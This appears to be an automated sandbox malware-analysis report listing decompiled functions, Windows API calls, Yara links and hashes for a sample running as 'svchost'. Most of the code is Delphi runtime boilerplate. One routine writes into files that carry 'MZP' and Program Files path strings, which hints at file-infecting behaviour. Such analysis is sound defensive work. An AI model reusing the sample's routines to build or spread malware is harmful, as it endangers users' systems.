                                                                          • GetObjectA.GDI32(00000000,00000018,?), ref: 00410221
                                                                          • GetObjectA.GDI32(?,00000018,?), ref: 00410356
                                                                          • CopyImage.USER32(?,00000000,?,?,00000000), ref: 0041040F
                                                                          • CopyImage.USER32(?,00000000,?,?,00000000), ref: 00410496
                                                                          • CopyImage.USER32(?,00000000,?,?,00002000), ref: 004101EA
                                                                            • Part of subcall function 0040FC78: GetObjectA.GDI32(00000000,00000018), ref: 0040FC8A
                                                                            • Part of subcall function 0040FBEC: 72E7AC50.USER32(00000000,?,?,?,?,?,?,?,?,0040FBC8), ref: 0040FC0F
                                                                            • Part of subcall function 0040FBEC: 72E7A7A0.GDI32(00000000,?,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,0040FBC8), ref: 0040FC2A
                                                                            • Part of subcall function 0040FBEC: 72E7B380.USER32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?), ref: 0040FC35
                                                                          • CopyImage.USER32(?,00000000,?,?,00000000), ref: 0041052B
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1189138838.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000002.00000002.1188634524.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000002.00000002.1188821159.0000000000401000.00000020.00020000.sdmp Download File
                                                                          • Associated: 00000002.00000002.1189771746.0000000000418000.00000002.00020000.sdmp Download File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Object$CopyImage$B380
                                                                          • String ID: (
                                                                          • API String ID: 1117845954-3887548279
                                                                          • Opcode ID: 39a78b10d7024776e478eb120b2c750533621c1c387b0d6abdafb054a84c2d99
                                                                          • Instruction ID: a4bd64b3fd63d48472c9145484328d1e8b73c1e654bc960fa13628ff834bc38b
                                                                          • Opcode Fuzzy Hash: 39a78b10d7024776e478eb120b2c750533621c1c387b0d6abdafb054a84c2d99
                                                                          • Instruction Fuzzy Hash: 05E15134E002189BDB20EBA9C885BDEB7B5AF48314F50807BF505F7382DA799D85CB59
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00410C68, Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 184COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetFileAttributesA.KERNEL32(00000000,00000000,Function_0000748C), ref: 00410DB0
                                                                          • SetFileAttributesA.KERNEL32(00000000,00000000,00000000,00000000,Function_0000748C), ref: 00410DC2
                                                                            • Part of subcall function 0040E600: CreateFileA.KERNEL32(?,40000400,40000400,00000000,40000400,40000400,00000000,0040E6CC,00000000,Function_00004C66), ref: 0040E620
                                                                          • SetFileAttributesA.KERNEL32(00000000,00000000,00000000,00000000,Function_0000748C), ref: 00410EF9
                                                                            • Part of subcall function 0040E65C: ReadFile.KERNEL32(00000000,?,?,?,00000000,00000000,?,0040E75F,00000000,Function_00004CE6), ref: 0040E667
                                                                            • Part of subcall function 0040E64C: SetFilePointer.KERNEL32(00000000,000003E8,00000000,?,00410C11,00000000,Function_000071BF), ref: 0040E654
                                                                            • Part of subcall function 0040E678: WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0040E682
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1189138838.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000002.00000002.1188634524.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000002.00000002.1188821159.0000000000401000.00000020.00020000.sdmp Download File
                                                                          • Associated: 00000002.00000002.1189771746.0000000000418000.00000002.00020000.sdmp Download File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: File$Attributes$CreatePointerReadWrite
                                                                          • String ID: M$MZP$Z$\PROGRA~1\
                                                                          • API String ID: 997383822-4093836345
                                                                          • Opcode ID: 0ffbdbd9c4ce7faddcbce69822ed9a4bb391a8709582c286f98777811686da55
                                                                          • Instruction ID: 2f0480c31d9fc6f6f6bd4ff7e20304d554dec23e4d9677c87e7e87a18c1bd8bd
                                                                          • Opcode Fuzzy Hash: 0ffbdbd9c4ce7faddcbce69822ed9a4bb391a8709582c286f98777811686da55
                                                                          • Instruction Fuzzy Hash: B1515570B003089BDB14FB6ECC8269EB3659F55308F5089BBB404B73D2DA7D9E854B59
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0040184C, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 62COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 71%
                                                                          			E0040184C() {
				void* _t2;
				void* _t3;
				void* _t14;
				intOrPtr* _t19;
				intOrPtr _t23;
				intOrPtr _t26;
				intOrPtr _t28;

				_t26 = _t28;
				if( *0x40a5ac == 0) {
					return _t2;
				} else {
					_push(_t26);
					_push(E00401922);
					_push( *[fs:edx]);
					 *[fs:edx] = _t28;
					if( *0x40a035 != 0) {
						_push(0x40a5b4);
						L004010E4();
					}
					 *0x40a5ac = 0;
					_t3 =  *0x40a60c; // 0x570960
					LocalFree(_t3);
					 *0x40a60c = 0;
					_t19 =  *0x40a5d4; // 0x571f74
					while(_t19 != 0x40a5d4) {
						VirtualFree( *(_t19 + 8), 0, 0x8000);
						_t19 =  *_t19;
					}
					E0040114C(0x40a5d4);
					E0040114C(0x40a5e4);
					E0040114C(0x40a610);
					_t14 =  *0x40a5cc; // 0x571960
					while(_t14 != 0) {
						 *0x40a5cc =  *_t14;
						LocalFree(_t14);
						_t14 =  *0x40a5cc; // 0x571960
					}
					_pop(_t23);
					 *[fs:eax] = _t23;
					_push(0x401929);
					if( *0x40a035 != 0) {
						_push(0x40a5b4);
						L004010EC();
					}
					_push(0x40a5b4);
					L004010F4();
					return 0;
				}
			}










                                                                          0x0040184d
                                                                          0x00401857
                                                                          0x0040192b
                                                                          0x0040185d
                                                                          0x0040185f
                                                                          0x00401860
                                                                          0x00401865
                                                                          0x00401868
                                                                          0x00401872
                                                                          0x00401874
                                                                          0x00401879
                                                                          0x00401879
                                                                          0x0040187e
                                                                          0x00401885
                                                                          0x0040188b
                                                                          0x00401892
                                                                          0x00401897
                                                                          0x004018b1
                                                                          0x004018aa
                                                                          0x004018af
                                                                          0x004018af
                                                                          0x004018be
                                                                          0x004018c8
                                                                          0x004018d2
                                                                          0x004018d7
                                                                          0x004018de
                                                                          0x004018e2
                                                                          0x004018e9
                                                                          0x004018ee
                                                                          0x004018f3
                                                                          0x004018f9
                                                                          0x004018fc
                                                                          0x004018ff
                                                                          0x0040190b
                                                                          0x0040190d
                                                                          0x00401912
                                                                          0x00401912
                                                                          0x00401917
                                                                          0x0040191c
                                                                          0x00401921
                                                                          0x00401921

                                                                          APIs
                                                                          • RtlEnterCriticalSection.KERNEL32(0040A5B4,00000000,00401922), ref: 00401879
                                                                          • LocalFree.KERNEL32(00570960,00000000,00401922), ref: 0040188B
                                                                          • VirtualFree.KERNEL32(?,00000000,00008000,00570960,00000000,00401922), ref: 004018AA
                                                                          • LocalFree.KERNEL32(00571960,?,00000000,00008000,00570960,00000000,00401922), ref: 004018E9
                                                                          • RtlLeaveCriticalSection.KERNEL32(0040A5B4,00401929,00570960,00000000,00401922), ref: 00401912
                                                                          • RtlDeleteCriticalSection.KERNEL32(0040A5B4,00401929,00570960,00000000,00401922), ref: 0040191C
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1188821159.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000002.00000002.1188634524.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000002.00000002.1189138838.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000002.00000002.1189771746.0000000000418000.00000002.00020000.sdmp Download File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                                          • String ID: `W
                                                                          • API String ID: 3782394904-2472242476
                                                                          • Opcode ID: 7abece6553a5b58226f49e8cc0da803076ff11b1e6c82b72a6b22a285eae2257
                                                                          • Instruction ID: 2c75820c4bf2e6ed0dab6d922aeac6927b5e2e4dc662dc8188128fe539cf0cf0
                                                                          • Opcode Fuzzy Hash: 7abece6553a5b58226f49e8cc0da803076ff11b1e6c82b72a6b22a285eae2257
                                                                          • Instruction Fuzzy Hash: FD1182B1704380AEE715EBA69D92B1277E8B745708F14847BF140B66F2C67D9860CB1E
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0040B2E4, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 62COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • RtlEnterCriticalSection.KERNEL32(0040A5B4,00000000,00401922), ref: 0040B311
                                                                          • LocalFree.KERNEL32(00570960,00000000,00401922), ref: 0040B323
                                                                          • VirtualFree.KERNEL32(?,00000000,00008000,00570960,00000000,00401922), ref: 0040B342
                                                                          • LocalFree.KERNEL32(00571960,?,00000000,00008000,00570960,00000000,00401922), ref: 0040B381
                                                                          • RtlLeaveCriticalSection.KERNEL32(0040A5B4,00401929,00570960,00000000,00401922), ref: 0040B3AA
                                                                          • RtlDeleteCriticalSection.KERNEL32(0040A5B4,00401929,00570960,00000000,00401922), ref: 0040B3B4
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1189138838.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000002.00000002.1188634524.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000002.00000002.1188821159.0000000000401000.00000020.00020000.sdmp Download File
                                                                          • Associated: 00000002.00000002.1189771746.0000000000418000.00000002.00020000.sdmp Download File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                                          • String ID: `W
                                                                          • API String ID: 3782394904-2472242476
                                                                          • Opcode ID: 0f79b80e4af174c3d8e2b3e99fd1f2623f38497129b59f83d594d4178c338b32
                                                                          • Instruction ID: 308c92a7e2b5e7ecfd07cead530b628894948fc1d130f20f37bfe88cfaf8842a
                                                                          • Opcode Fuzzy Hash: 0f79b80e4af174c3d8e2b3e99fd1f2623f38497129b59f83d594d4178c338b32
                                                                          • Instruction Fuzzy Hash: 89115EB06043406ED711EB669D41B167BB9F745708F24843BE944B62E2C77DA870CB6F
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0040C9B0, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 38filewindowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,0040CA7E,?,?,?,?,?,?,?,0040CB1E,0040BF7B), ref: 0040C9E9
                                                                          • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,0040CA7E,?,?,?,?,?,?,?,0040CB1E), ref: 0040C9EF
                                                                          • GetStdHandle.KERNEL32(000000F5,Function_00002FA0,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,0040CA7E), ref: 0040CA04
                                                                          • WriteFile.KERNEL32(00000000,000000F5,Function_00002FA0,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,0040CA7E), ref: 0040CA0A
                                                                          • MessageBoxA.USER32 ref: 0040CA28
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1189138838.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000002.00000002.1188634524.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000002.00000002.1188821159.0000000000401000.00000020.00020000.sdmp Download File
                                                                          • Associated: 00000002.00000002.1189771746.0000000000418000.00000002.00020000.sdmp Download File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: FileHandleWrite$Message
                                                                          • String ID: Error$Runtime error at 00000000
                                                                          • API String ID: 1570097196-2970929446
                                                                          • Opcode ID: 3a9f92cc1793bd906a324f4b2820f365d342c083d99e01712e2be0f2c1988d27
                                                                          • Instruction ID: e346e235dea6380484e37d32cf1e26acb754014f59db45d581b47c6c48365cc5
                                                                          • Opcode Fuzzy Hash: 3a9f92cc1793bd906a324f4b2820f365d342c083d99e01712e2be0f2c1988d27
                                                                          • Instruction Fuzzy Hash: 58F0CDA0BC430878E620E3A4AE0AF5A221C4348B15F60463FB220741D3C6BC4894C72F
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00402F18, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 38filewindowCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 79%
                                                                          			E00402F18(void* __ecx) {
				long _v4;
				int _t3;

				if( *0x40a034 == 0) {
					if( *0x409024 == 0) {
						_t3 = MessageBoxA(0, "Runtime error     at 00000000", "Error", 0);
					}
					return _t3;
				} else {
					if( *0x40a208 == 0xd7b2 &&  *0x40a210 > 0) {
						 *0x40a220();
					}
					WriteFile(GetStdHandle(0xfffffff5), "Runtime error     at 00000000", 0x1e,  &_v4, 0);
					return WriteFile(GetStdHandle(0xfffffff5), E00402FA0, 2,  &_v4, 0);
				}
			}





                                                                          0x00402f20
                                                                          0x00402f80
                                                                          0x00402f90
                                                                          0x00402f90
                                                                          0x00402f96
                                                                          0x00402f22
                                                                          0x00402f2b
                                                                          0x00402f3b
                                                                          0x00402f3b
                                                                          0x00402f57
                                                                          0x00402f78
                                                                          0x00402f78

                                                                          APIs
                                                                          • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,00402FE6,?,00000000,?,00000001,00403086,004024E3,0040252B,00000000,00000000), ref: 00402F51
                                                                          • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,00402FE6,?,00000000,?,00000001,00403086,004024E3,0040252B,00000000), ref: 00402F57
                                                                          • GetStdHandle.KERNEL32(000000F5,00402FA0,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,00402FE6,?,00000000), ref: 00402F6C
                                                                          • WriteFile.KERNEL32(00000000,000000F5,00402FA0,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,00402FE6,?,00000000), ref: 00402F72
                                                                          • MessageBoxA.USER32 ref: 00402F90
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1188821159.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000002.00000002.1188634524.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000002.00000002.1189138838.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000002.00000002.1189771746.0000000000418000.00000002.00020000.sdmp Download File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: FileHandleWrite$Message
                                                                          • String ID: Error$Runtime error at 00000000
                                                                          • API String ID: 1570097196-2970929446
                                                                          • Opcode ID: ef94cf404df6f7a5011913507198a6df15fac8ea4ed7590dcb41cd545e331a2c
                                                                          • Instruction ID: 6c3b7e42d3c7ef80f9ab9078d96d43441ff44d86987642024caec186a117226f
                                                                          • Opcode Fuzzy Hash: ef94cf404df6f7a5011913507198a6df15fac8ea4ed7590dcb41cd545e331a2c
                                                                          • Instruction Fuzzy Hash: 5AF0B47168438538E630A3609F0EF5A226C4744B99F20467FB660781F6C7FC58C4921E
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0040D815, Relevance: 9.0, APIs: 6, Instructions: 41threadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 0040C2A0: GetKeyboardType.USER32(00000000), ref: 0040C2A5
                                                                            • Part of subcall function 0040C2A0: GetKeyboardType.USER32(00000001), ref: 0040C2B1
                                                                          • GetCommandLineA.KERNEL32 ref: 0040D87B
                                                                          • GetVersion.KERNEL32 ref: 0040D88F
                                                                          • GetVersion.KERNEL32 ref: 0040D8A0
                                                                          • GetCurrentThreadId.KERNEL32 ref: 0040D8DC
                                                                            • Part of subcall function 0040C2D0: RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0040C2F2
                                                                            • Part of subcall function 0040C2D0: RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,004028A9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0040C325
                                                                            • Part of subcall function 0040C2D0: RegCloseKey.ADVAPI32(?,004028B0,00000000,?,00000004,00000000,004028A9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0040C33B
                                                                          • GetThreadLocale.KERNEL32 ref: 0040D8BC
                                                                            • Part of subcall function 0040D74C: GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,00403D1A), ref: 0040D772
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1189138838.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000002.00000002.1188634524.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000002.00000002.1188821159.0000000000401000.00000020.00020000.sdmp Download File
                                                                          • Associated: 00000002.00000002.1189771746.0000000000418000.00000002.00020000.sdmp Download File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: KeyboardLocaleThreadTypeVersion$CloseCommandCurrentInfoLineOpenQueryValue
                                                                          • String ID:
                                                                          • API String ID: 3734044017-0
                                                                          • Opcode ID: 0632ebee869107818fc617476dd3b707cbc1511b343300be66bfea40396029a6
                                                                          • Instruction ID: 917de0a484455ad82c20158439a2a24f06621c5804a29fc775aa2cf17b207d74
                                                                          • Opcode Fuzzy Hash: 0632ebee869107818fc617476dd3b707cbc1511b343300be66bfea40396029a6
                                                                          • Instruction Fuzzy Hash: F10129B1C113449AE711BFB1AA463193A60AB1130CF10857FD151762E2EB7D00A8DB6F
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00403D7D, Relevance: 9.0, APIs: 6, Instructions: 41threadCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E00403D7D(void* __eax, void* __ebx, void* __ecx, intOrPtr* __edi) {
				long _t11;
				void* _t16;

				_t16 = __ebx;
				 *__edi =  *__edi + __ecx;
				 *((intOrPtr*)(__eax - 0x40a5a4)) =  *((intOrPtr*)(__eax - 0x40a5a4)) + __eax - 0x40a5a4;
				 *0x40900c = 2;
				 *0x40a010 = 0x401008;
				 *0x40a014 = 0x401010;
				 *0x40a036 = 2;
				 *0x40a000 = E00403960;
				if(E00402808() != 0) {
					_t3 = E00402838();
				}
				E004028FC(_t3);
				 *0x40a03c = 0xd7b0;
				 *0x40a208 = 0xd7b0;
				 *0x40a3d4 = 0xd7b0;
				 *0x40a02c = GetCommandLineA();
				 *0x40a028 = E00401098();
				if((GetVersion() & 0x80000000) == 0x80000000) {
					 *0x40a5a8 = E00403CB4(GetThreadLocale(), _t16, __eflags);
				} else {
					if((GetVersion() & 0x000000ff) <= 4) {
						 *0x40a5a8 = E00403CB4(GetThreadLocale(), _t16, __eflags);
					} else {
						 *0x40a5a8 = 3;
					}
				}
				_t11 = GetCurrentThreadId();
				 *0x40a020 = _t11;
				return _t11;
			}





                                                                          0x00403d7d
                                                                          0x00403d82
                                                                          0x00403d87
                                                                          0x00403d89
                                                                          0x00403d90
                                                                          0x00403d9a
                                                                          0x00403da4
                                                                          0x00403dab
                                                                          0x00403dbc
                                                                          0x00403dbe
                                                                          0x00403dbe
                                                                          0x00403dc3
                                                                          0x00403dc8
                                                                          0x00403dd1
                                                                          0x00403dda
                                                                          0x00403de8
                                                                          0x00403df2
                                                                          0x00403e06
                                                                          0x00403e3f
                                                                          0x00403e08
                                                                          0x00403e16
                                                                          0x00403e2e
                                                                          0x00403e18
                                                                          0x00403e18
                                                                          0x00403e18
                                                                          0x00403e16
                                                                          0x00403e44
                                                                          0x00403e49
                                                                          0x00403e4e

                                                                          APIs
                                                                            • Part of subcall function 00402808: GetKeyboardType.USER32(00000000), ref: 0040280D
                                                                            • Part of subcall function 00402808: GetKeyboardType.USER32(00000001), ref: 00402819
                                                                          • GetCommandLineA.KERNEL32 ref: 00403DE3
                                                                          • GetVersion.KERNEL32 ref: 00403DF7
                                                                          • GetVersion.KERNEL32 ref: 00403E08
                                                                          • GetCurrentThreadId.KERNEL32 ref: 00403E44
                                                                            • Part of subcall function 00402838: RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0040285A
                                                                            • Part of subcall function 00402838: RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,004028A9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0040288D
                                                                            • Part of subcall function 00402838: RegCloseKey.ADVAPI32(?,004028B0,00000000,?,00000004,00000000,004028A9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 004028A3
                                                                          • GetThreadLocale.KERNEL32 ref: 00403E24
                                                                            • Part of subcall function 00403CB4: GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,00403D1A), ref: 00403CDA
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1188821159.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000002.00000002.1188634524.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000002.00000002.1189138838.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000002.00000002.1189771746.0000000000418000.00000002.00020000.sdmp Download File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: KeyboardLocaleThreadTypeVersion$CloseCommandCurrentInfoLineOpenQueryValue
                                                                          • String ID:
                                                                          • API String ID: 3734044017-0
                                                                          • Opcode ID: 0632ebee869107818fc617476dd3b707cbc1511b343300be66bfea40396029a6
                                                                          • Instruction ID: 4e42c8c4ff7c9e6347351f52ed3844a5f6dcad7449c2d11acc3bcf8107044070
                                                                          • Opcode Fuzzy Hash: 0632ebee869107818fc617476dd3b707cbc1511b343300be66bfea40396029a6
                                                                          • Instruction Fuzzy Hash: 7B016DB180438599E710BF72AA4A3193E64AB11309F10853FA080BA3F3D77D06989B6F
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00402838, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49registryCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 65%
                                                                          			E00402838() {
				void* _v8;
				char _v12;
				int _v16;
				signed short _t12;
				signed short _t14;
				intOrPtr _t27;
				void* _t29;
				void* _t31;
				intOrPtr _t32;

				_t29 = _t31;
				_t32 = _t31 + 0xfffffff4;
				_v12 =  *0x409018 & 0x0000ffff;
				if(RegOpenKeyExA(0x80000002, "SOFTWARE\\Borland\\Delphi\\RTL", 0, 1,  &_v8) != 0) {
					_t12 =  *0x409018; // 0x1332
					_t14 = _t12 & 0x0000ffc0 | _v12 & 0x0000003f;
					 *0x409018 = _t14;
					return _t14;
				} else {
					_push(_t29);
					_push(E004028A9);
					_push( *[fs:eax]);
					 *[fs:eax] = _t32;
					_v16 = 4;
					RegQueryValueExA(_v8, "FPUMaskValue", 0, 0,  &_v12,  &_v16);
					_pop(_t27);
					 *[fs:eax] = _t27;
					_push(0x4028b0);
					return RegCloseKey(_v8);
				}
			}












                                                                          0x00402839
                                                                          0x0040283b
                                                                          0x00402845
                                                                          0x00402861
                                                                          0x004028b0
                                                                          0x004028c2
                                                                          0x004028c5
                                                                          0x004028ce
                                                                          0x00402863
                                                                          0x00402865
                                                                          0x00402866
                                                                          0x0040286b
                                                                          0x0040286e
                                                                          0x00402871
                                                                          0x0040288d
                                                                          0x00402894
                                                                          0x00402897
                                                                          0x0040289a
                                                                          0x004028a8
                                                                          0x004028a8

                                                                          APIs
                                                                          • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0040285A
                                                                          • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,004028A9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0040288D
                                                                          • RegCloseKey.ADVAPI32(?,004028B0,00000000,?,00000004,00000000,004028A9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 004028A3
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1188821159.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000002.00000002.1188634524.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000002.00000002.1189138838.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000002.00000002.1189771746.0000000000418000.00000002.00020000.sdmp Download File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CloseOpenQueryValue
                                                                          • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                                                                          • API String ID: 3677997916-4173385793
                                                                          • Opcode ID: ee928b2e9c36cee54b4de11c3a3cd2293e0062a039f5b8df71b0887b07d0b7b2
                                                                          • Instruction ID: a813fbf5fdd61ad2e6297c1d03dc0b5dcb1e266bf9714427259c3b0395662638
                                                                          • Opcode Fuzzy Hash: ee928b2e9c36cee54b4de11c3a3cd2293e0062a039f5b8df71b0887b07d0b7b2
                                                                          • Instruction Fuzzy Hash: 9D018D7A940308B9EB11EF90CD46FEA77ACDB04700F104177B904F65D0E6785A54D79C
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0040C2D0, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49registryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0040C2F2
                                                                          • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,004028A9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0040C325
                                                                          • RegCloseKey.ADVAPI32(?,004028B0,00000000,?,00000004,00000000,004028A9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0040C33B
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1189138838.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000002.00000002.1188634524.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000002.00000002.1188821159.0000000000401000.00000020.00020000.sdmp Download File
                                                                          • Associated: 00000002.00000002.1189771746.0000000000418000.00000002.00020000.sdmp Download File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CloseOpenQueryValue
                                                                          • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                                                                          • API String ID: 3677997916-4173385793
                                                                          • Opcode ID: ee928b2e9c36cee54b4de11c3a3cd2293e0062a039f5b8df71b0887b07d0b7b2
                                                                          • Instruction ID: c6bc4c080fc5fa975f8bb2417a4f68ba34bc7cc60baef9af76509d3dfd8a5f6d
                                                                          • Opcode Fuzzy Hash: ee928b2e9c36cee54b4de11c3a3cd2293e0062a039f5b8df71b0887b07d0b7b2
                                                                          • Instruction Fuzzy Hash: 1F01527A950308BAEB11EB90CD46BEA77ACDB04700F604176BA04F65C0E6B86A54D79D
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0040B220, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 48memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • RtlInitializeCriticalSection.KERNEL32(0040A5B4,00000000,Function_0000183E), ref: 0040B236
                                                                          • RtlEnterCriticalSection.KERNEL32(0040A5B4,0040A5B4,00000000,Function_0000183E), ref: 0040B249
                                                                          • LocalAlloc.KERNEL32(00000000,00000FF8,0040A5B4,00000000,Function_0000183E), ref: 0040B273
                                                                          • RtlLeaveCriticalSection.KERNEL32(0040A5B4,00401845,00000000,Function_0000183E), ref: 0040B2D0
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1189138838.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
